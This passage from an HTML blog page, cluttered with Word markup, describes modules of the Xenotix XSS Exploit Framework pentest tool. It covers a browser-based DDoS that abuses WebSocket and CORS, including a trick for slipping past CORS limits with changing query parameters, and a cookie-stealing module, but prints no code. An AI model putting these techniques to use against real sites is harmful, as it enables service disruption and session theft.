Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles></xml><![endif]--><!--[if gte mso 10]><style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:8.0pt; mso-para-margin-left:0in; line-height:107%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} </style><![endif]--> </div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">[VIDEO] <a href="https://www.youtube.com/watch?v=IT-8IH3yRrA">https://www.youtube.com/watch?v=IT-8IH3yRrA</a> [/VIDEO]</span></b></div><br /><h4><b style="mso-bidi-font-weight: normal;"><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">XSS DDoSer</span></b></h4><h4><b style="mso-bidi-font-weight: normal;"><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"></span></b></h4><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><span style="mso-spacerun: yes;"></span></span></div><div class="MsoNormal"><span style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://oi49.tinypic.com/sb0ro7.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="http://oi49.tinypic.com/sb0ro7.jpg" width="400" /></a></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;">With HTML 5 comes great power. We harvest the power of HTML 5 to abuse the Cross Origin Resource Sharing (CORS) and WebSocket to implement a DDoS attack.<span style="mso-spacerun: yes;">  </span>WebSocket is a technology that allow web applications to have a bidirectional channel to a URI endpoint. Sockets can send and receive data to and from a web server and respond to opening or closing a WebSocket. The XMLHttpRequest is a JavaScript object which is used to exchange data between a server and a bowser behind the scene<span style="color: #00b050;">. </span>This can be used for Cross Origin Resource Sharing (CORS). We can perform a combined and powerful DDoS attack by abusing these two technologies. This module abuses WebSocket and creates numerous socket connections with a target server to slow it down. Along with it by abusing CORS, the add-on create numerous fake GET requests to slow down the target server. When we send the first request to the target server and the response contains the 'Access-Control-Allow-Origin' header with a value that restricts cross site requests, then at times the browser refuses to send more requests to the same URL. However this can be easily bypassed by making every request unique by adding a non-existing query-string parameter with changing values.</span><span style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"></span></b></span></span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://oi50.tinypic.com/14r02e.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="http://oi50.tinypic.com/14r02e.jpg" width="400" /></a></div><div class="MsoNormal"><span style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"></span></b><span style="font-size: small;"><span style="font-family: "Calibri","sans-serif"; line-height: 115%;"></span></span><b style="mso-bidi-font-weight: normal;"><span style="font-family: "Calibri","sans-serif"; font-size: 14.0pt; line-height: 115%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-size: 11.0pt; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-latin; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"></span></b><br /></span></span></div><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><span style="mso-spacerun: yes;">  </span></span></div><div class="MsoNormal"></div><div class="MsoNormal"><br /></div><div class="MsoNormal"><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument></xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true" DefSemiHidden="true" DefQFormat="false" DefPriority="99" LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false" UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false" UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false" UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false" UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false" UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false" UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false" UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false" UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false" UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles></xml><![endif]--><!--[if gte mso 10]><style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin-top:0in; mso-para-margin-right:0in; mso-para-margin-bottom:8.0pt; mso-para-margin-left:0in; line-height:107%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} </style><![endif]--> </div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">[VIDEO] <a href="https://www.youtube.com/watch?v=cgLGgVWvi9Y">https://www.youtube.com/watch?v=cgLGgVWvi9Y</a> [/VIDEO]</span></b></div><br /><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"></span></b></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> </span></b></div><h4 class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">XSS Cookie Thief</span></b></b></h4><div class="separator" style="clear: both; text-align: center;"><a href="http://i47.tinypic.com/fypy8m.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="http://i47.tinypic.com/fypy8m.png" width="400" /></a></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"><br /></span></b></div><div class="MsoNormal"></div><div class="MsoNormal"></div><div class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 14.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">  </span></b></div><div class="MsoNormal"></div><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">It’s the traditional Cookie Stealer but a bit advanced and with real time cookie viewer. This module allows the pentester to create cookie stealing POC.</span></div><h4 class="MsoNormal"><b><span style="mso-bidi-font-weight: normal;"><span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;"> </span></span></b></h4><h4 class="MsoNormal"><b><span style="mso-bidi-font-weight: normal;"><span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Features for the Next Build</span></span></b></h4><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Current version of XSS Exploit Framework is based on Internet Explorer’s webpage rendering engine Trident. Since XSS got slightly different behavior in different Web Browsers, the support for the Gecko (Used by Mozilla Firefox) and Webkit (used by Chrome, Opera, and Safari) Rendering engines will be added up in the next build. The support for XSS in POST Parameter and XSS testing by modifying the headers will be included in the next build. XSS Proxy to tunnel the victim-server traffic will be added in future builds. Automatic detection of parameters or variables vulnerable against XSS and DOM Based XSS detection will be added up in next build.</span></div><h4 class="MsoNormal"><b style="mso-bidi-font-weight: normal;"><span style="font-size: 18.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">Conclusion</span></b></h4><div class="MsoNormal"><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin;">XSS in popular website is a high security threat. Xenotix XSS Exploit Framework can be used by Security Analysts to perform penetration test on Web Applications against XSS vulnerability and to create POC with the inbuilt exploitation framework. Most of the security tools related to XSS are either XSS Scanners or XSS Exploitation tools. Xenotix XSS Exploitation Framework is the first of its kind to act both as an XSS vulnerability scanner as well as XSS exploitation framework. Bug bounty programs like Google Vulnerability Reward Program, Facebook Bounty, Paypal bug bountyetc. are there. So go for a XSS hunting and grab your bounty.</span><span style="font-family: Wingdings; font-size: 12.0pt; line-height: 115%; mso-ascii-font-family: Calibri; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-bidi-theme-font: minor-latin; mso-char-type: symbol; mso-hansi-font-family: Calibri; mso-hansi-theme-font: minor-latin; 